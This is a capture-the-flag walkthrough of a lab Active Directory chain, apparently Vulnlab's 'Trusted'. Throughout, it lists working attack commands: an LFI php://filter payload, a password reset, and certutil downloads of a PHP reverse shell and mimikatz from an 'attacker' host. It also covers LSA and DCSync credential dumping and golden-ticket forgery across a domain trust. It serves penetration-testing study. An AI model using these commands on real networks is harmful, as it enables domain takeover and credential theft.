Skip to main content

Chain - Trusted

Initial Recon

Targets:

  • 10.10.226.245 (trusted.vl)
  • 10.10.226.246 (lab.trusted.vl)

Services Identified:

  • LDAP, Kerberos, RDP, HTTP/HTTPS, SMB, RPC on both
  • Apache + XAMPP on lab.trusted.vl

Web Enumeration (10.10.226.246)

XAMPP Apache

  • Version: Apache/2.4.53, PHP/8.1.6
  • phpinfo exposed: /dashboard/phpinfo.php
  • allow_url_fopen enabled

Fuzzing

wfuzz -c --hh 306 -w raft-medium-directories.txt http://labdc.lab.trusted.vl/FUZZ
Found: /dev

LFI + Source Disclosure:

/dev/index.html?view=php://filter/convert.base64-encode/resource=db.php
Credentials found:
- User: root
- Pass: [REDACTED]

MySQL Access

mysql -h labdc.lab.trusted.vl -u root -p
use news;
select * from users;

Cracked rsmith password:

[REDACTED]

SMB + BloodHound

nxc smb 10.10.136.38 -u rsmith -p '[REDACTED]' --shares
bloodhound-python -u rsmith -p [REDACTED] -d lab.trusted.vl -dc labdc.lab.trusted.vl -ns 10.10.136.38
  • rsmith can reset ewalters's password

PrivEsc: ewalters Access

Set-DomainUserPassword -Identity EWALTERS -AccountPassword [REDACTED]

Login via WinRM:

evil-winrm -i 10.10.136.38 -u ewalters -p [REDACTED]
  • Has SeMachineAccountPrivilege

Readme.txt Clue

C:/AVTest/readme.txt
Christine ran AV tools - likely test environment

XAMPP RCE via PHP Reverse Shell

certutil.exe -urlcache -split -f http://attacker/winphprevshell.php rev.php
Visit https://labdc.lab.trusted.vl/rev.php

Gain SYSTEM shell

Dump Credentials (Local Admin Access)

certutil.exe -urlcache -split -f http://attacker/mimikatz.exe mimikatz.exe
mimikatz "privilege::debug" "lsadump::lsa /patch"

Dumped Administrator NTLM hash: [REDACTED]

Login as Administrator

evil-winrm -i 10.10.136.38 -u Administrator -H [REDACTED]

Dump Other Credentials

secretsdump.py lab.trusted.vl/'LABDC$'@10.10.136.38 -hashes :[REDACTED]

Trust Enumeration

Get-ADTrust -Filter *
BiDirectional trust: lab.trusted.vl <-> trusted.vl

Cross-Trust Attack (Golden Ticket)

krbtgt NTLM (child): [REDACTED]
Domain SID (parent): S-1-5-21-3576695518-347000760-3731839591

Create Golden Ticket:

mimikatz "kerberos::golden /user:Administrator /domain:lab.trusted.vl /sid:S-1-5-21-2241985869-2159962460-1278545866 /krbtgt:[REDACTED] /sids:S-1-5-21-3576695518-347000760-3731839591-519 /ptt"

Dump Trusted DC creds:

lsadump::dcsync /domain:trusted.vl /dc:trusteddc.trusted.vl /all

Administrator NTLM (trusted): [REDACTED]

Full DA Access to Trusted Domain

evil-winrm -i 10.10.226.245 -u Administrator -H [REDACTED]

(Optional) Automated Golden Ticket

impacket-raiseChild lab.trusted.vl/cpowers -hashes :[REDACTED]

Final Step - Decrypt Flag

[System.IO.File]::GetAttributes("C:\Users\Administrator\Desktop\root.txt").ToString().Contains("Encrypted")

Set new admin password and run:

runas.exe Administrator "[REDACTED]" "cmd.exe /c type C:\Users\Administrator\Desktop\root.txt"
Back to top